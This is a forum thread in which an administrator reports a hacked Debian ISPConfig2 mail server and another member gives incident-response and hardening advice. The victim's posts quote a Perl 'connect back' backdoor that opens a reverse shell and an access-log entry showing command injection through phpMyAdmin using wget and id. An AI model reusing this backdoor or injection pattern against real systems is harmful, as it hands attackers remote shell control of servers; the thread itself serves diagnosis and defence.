ispconfig2 debian perfect server hacked! please help!!

Discussion in 'General' started by calcetinconrombosman, Oct 7, 2009.

  1. First of all, excuse my english, i'm a spanish native speaker. Today I tried to login to ispconfig2 control panel, and got this:
    Warning: include(../lib/ [function.include]: failed to open stream: No such file or directory in /home/admispconfig/ispconfig/web/login.php on line 30
    Warning: include() [function.include]: Failed opening '../lib/' for inclusion (include_path='.:') in /home/admispconfig/ispconfig/web/login.php on line 30
    Warning: require_once(login/lib/lang/.lng) [function.require-once]: failed to open stream: No such file or directory in /home/admispconfig/ispconfig/web/login.php on line 31
    Fatal error: require_once() [function.require]: Failed opening required 'login/lib/lang/.lng' (include_path='.:') in /home/admispconfig/ispconfig/web/login.php on line 31
    So i tried to get by ssh into the server, but it rejected the connection. So i run to my office as fast as i could, conected a screen and keyboard, and for my surprise, it presented me at the command line this:

    It looked very strange to me, but i tried to login anyway and it did nothing. when i typed "root" at the "login" and pressed enter, the cursor just returned to next line without asking or doing anything then i begin to understand. I rebooted the server and loged in by ssh (using putty), this time i could login, and search for changed files in the last 2 days. Found a new version of ssh under /usr/bin, and with 3:41 as time of change. Also, (../lib/ was deletted. I went through the logs and found this on /var/log/apache2/error.log:

    The file downloaded got this:

    use Socket;
    print "ZeuL's Connect Back Backdoor\n\n";
    if (!$ARGV[0]) {
      printf "Usage: $0 [Host] <Port>\n";
    print "[*] Dumping Arguments\n";
    $host = $ARGV[0];
    $port = 80;
    if ($ARGV[1]) {
      $port = $ARGV[1];
    print "[*] Connecting...\n";
    $proto = getprotobyname('tcp') || die("Unknown Protocol\n");
    socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
    my $target = inet_aton($host);
    if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
      die("Unable to Connect\n");
    print "[*] Spawning Shell\n";
    if (!fork( )) {
      exec {'/bin/sh'} '-bash' . "\0" x 4;
    print "[*] Datached\n\n";
    var/log/auth.log got this:
    and /var/log/kern.log got:

    Finally, when looking for chaged files, found a file under /usr/share named sshd.sync that got this:
    I'm pretty f**ked up, i need some directions please. The thing is that the mailserver is still going ok, and recently added 30 new users and half of them are working night and day on a urgent project for the next week, so i get the boot if i turn the server down.

  2. can i migrate the passwords and accounts?

    I've forgotten to ask if there is some chance to backup all the important files and configs to put them on another "perfect debian server w/ispconfig2" made from scratch?........thats what i meant by "replacing the server"
  3. damir

    damir New Member


    First, take a deep breath. If you have backup than it's ok. Don't panic. That's most important thing to remember. I have my share of crashed harddrives, servers and god know what else. It's not funny feeling but it's not the end of the world.

    Was you server patched with the latest security patches? Have you used strong passwords and was your ssh secured?

    First thing you should is to disconnect the machine from the network, than dump / to another harddrive. Because you never know what kind of backdoors, hack and scripts they left on the server. Only clean install will remove all that. You need to disconnect from network because you want to know how and through which security hole they came in. If you are in no hurry than you can while you are disconnected go through the server to find if this is done through bad web application like Joomla or something similar.

    When you done with that, it depends of the customers but you should put a new machine up asap. Patch that machine, and install the latest ISPconfig. Than you should restore from backup but before you do that go through users sites to see if there was any web app that had security holes.

    Some things to consider:

    Secure php and apache
    Install mod_security
    set ServerSiganture off and ServerTokens ProductOnly in apache2.conf
    SuEXEC and php through suPHP or fastcgi.
    use good firewall
    Install snort & ossec
    use fail2ban
    scan with rkhunter
    use strong passwords
    disable ROOT logins via SSH
    enable publickey authentication and allow your IP's only to connect to machine.
    disable services that you don't need.
    Monitor your machine

    Well there alot you can do but this is a good start, maybe someone else is gonna fill in.
    Last edited: Oct 7, 2009
  4. NEED TO ADD NEW there a command line way?

    Thanks for the tips Damir, i'm shurely going to do a secure install when i get the chance to turn off the server, falling is a way to learn..a painful one. My site DON'T HOST ANYTHING, just mail for ONE SITE, and ONE WEBPAGE (for the same site) that says "under construction" in plain html, and if you look at the first log that i posted you can see that the hacker is trying to get a weak php from the "sharedip" page included in ispconfig, so i really think that the way they got in was from weak php codes, that i didn't add (because i'm not hosting anything). Also, the site don't have roundcube, just using the squirrelmail downloaded for ispconfig2. A link describing the attack is this:

    The correct user is admispconfig or admispco?? I got the last one as the owner of several folders and can't tell if it was modified or just can't read the whole user name when doing "ls -la".

    my /etc/passwd file got this, can you tell me if there are normal users for a ispconfig2 install? (i've excluded mail users, nothing wrong in there)
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    webmaster:x:1000:1000:admin cefop,,,:/home/webmaster:/bin/bash
    mysql:x:106:107:MySQL Server,,,:/var/lib/mysql:/bin/false
    amavis:x:109:112:AMaViS system user,,,:/var/lib/amavis:/bin/sh
    admispconfig:x:1001:1001:Administrator ISPConfig:/home/admispconfig:/bin/bash
    filter:x:113:61:Postfix Filters:/var/spool/filter:/bin/sh
    if i trace all files and folders modified those obscure hours, i get this:
    cefopserver:/var/backups# find / -mmin -1500 ! -mmin -1320
    find: /proc/21294/task/21294/fd/4: No such file or directory
    find: /proc/21294/task/21294/fdinfo/4: No such file or directory
    find: /proc/21294/fd/4: No such file or directory
    find: /proc/21294/fdinfo/4: No such file or directory
    if i list just the files, i get this:
    cefopserver:/var/backups# find / -mmin -1500 ! -mmin -1320 -type f
    find: /proc/21352/task/21352/fd/4: No such file or directory
    find: /proc/21352/task/21352/fdinfo/4: No such file or directory
    find: /proc/21352/fd/4: No such file or directory
    find: /proc/21352/fdinfo/4: No such file or directory
    I've deletted the downloaded perl file, and expecting some direction on how to safely remove the corrupted ssh and reinstall a good one. Also please tell me if there is a way to restore the php config files deleted that prevent ispconfig control panel from working, since i have been asked to modify some accounts passwords and add some new users. From the directories and files modified above you can tell which directories got deletion, and please point me where to find info on what should those folders have. Mail, squirrelmail and DNS are still working ok. really Hoping to hear from anyone, i'll be awake until this gets better.... :(
    Last edited: Oct 7, 2009
  5. damir

    damir New Member

    If you have no sites on the server, than there are only applications like ISPConfig, PhpMyAdmin and squirrelmail that are installed. You do have latest Debian Lenny all patched up with latest security patches?
  6. mmm no. I just installed the "perfect debian lenny server" about four months ago, added squirrelmail, tweak some here and there, added the accounts, and let it alone :-( . Didn't apply any security patch to it. If you point me on the right direction, i'll be doing it in no time...

    looking again at the "/var/log/apache2/other_vhosts_access.log" i've found the exact command that got the "dc.txt" file into the server.

    localhost:80 - - [06/Oct/2009:03:35:40 -0400] "GET //phpmyadmin///;wget%20 HTTP/1.1" 200 114 "-" "Conf"
    and the next 2 lines (about 20 minutes later) show that them tried something again but by that time the file was already deleted (not sure about that).

    localhost:80 - - [06/Oct/2009:03:53:51 -0400] "GET //phpmyadmin/// HTTP/1.1" 404 409 "-" "Conf"
    localhost:80 - - [06/Oct/2009:03:53:52 -0400] "GET //phpmyadmin///;id HTTP/1.1" 404 409 "-" "Conf"
    by the way, the attacks came, coordinated, from munich, germany and from vancouver, canada. If you get to know them let me know...;)
    Last edited: Oct 7, 2009
  7. damir

    damir New Member

    It looks like they came in through phpmyadmin, which is known for security holes.

    Have you installed phpmyadmin through apt-get or did you do manual install? What version of phpmyadmin are you running?

    This is important to know so we can isolate the way the they came in.

    Update your server by issuing following command:

    Important: Maybe the script have corrupted some system files that makes upgrading not so easy. It's important that you have backup of the server.

    apt-get update
    apt-get -s upgrade

    (-s is for simulating upgrade process so you can see what packages are going to be installed)

    If you are ok with it than issue following command:

    apt-get upgrade
    Last edited: Oct 7, 2009
  8. if ssh is spawned, should i do an apt-get update?

    I fall asleep, but i'm back
    i don't have backups....i know its the worst thing to do...but shurely i'm not going to do it never again in this life or any other. Is there a way to safely backup now the databases of ispconfig and restore them on a fresh install? is there a way to add new users with maildirs by shell? i don't care now if its insecure because the mail accounts will be used just for coordination and not for any sensible data, i'm been asked to do it anyway, and then find the way to reinstall the perfect debian server on another machine and migrate the info to keep the mai accounts running.

    Now i remember how phpmyadmin came into the "perfect debian server - lenny - ispconfig2"....tired at the second night of installing it, in another of the howtoforge howtos, i followed the initial instructions of the fourth page of the howto for the same debian distro but the ispconfig3 one, so i did install it and when i realized that i was following the wrong howto, simply open the right one and continued from where i got in it.

    Thanks for all the help Damir.....
  9. can i get the accounts working again if i reinstall from scratch?

    is there a safe way to do it? some tutorial? i know i've been hacked, but i want to try to restore as much as i can to a new fresh install and secure it from the begining, obiously the files that report some change near the atack hours get out of the restore, starting with ssh.
  10. damir

    damir New Member

  11. thanks again Damir....

    i'm going to walk the rough and scary path....wish me luck.

Share This Page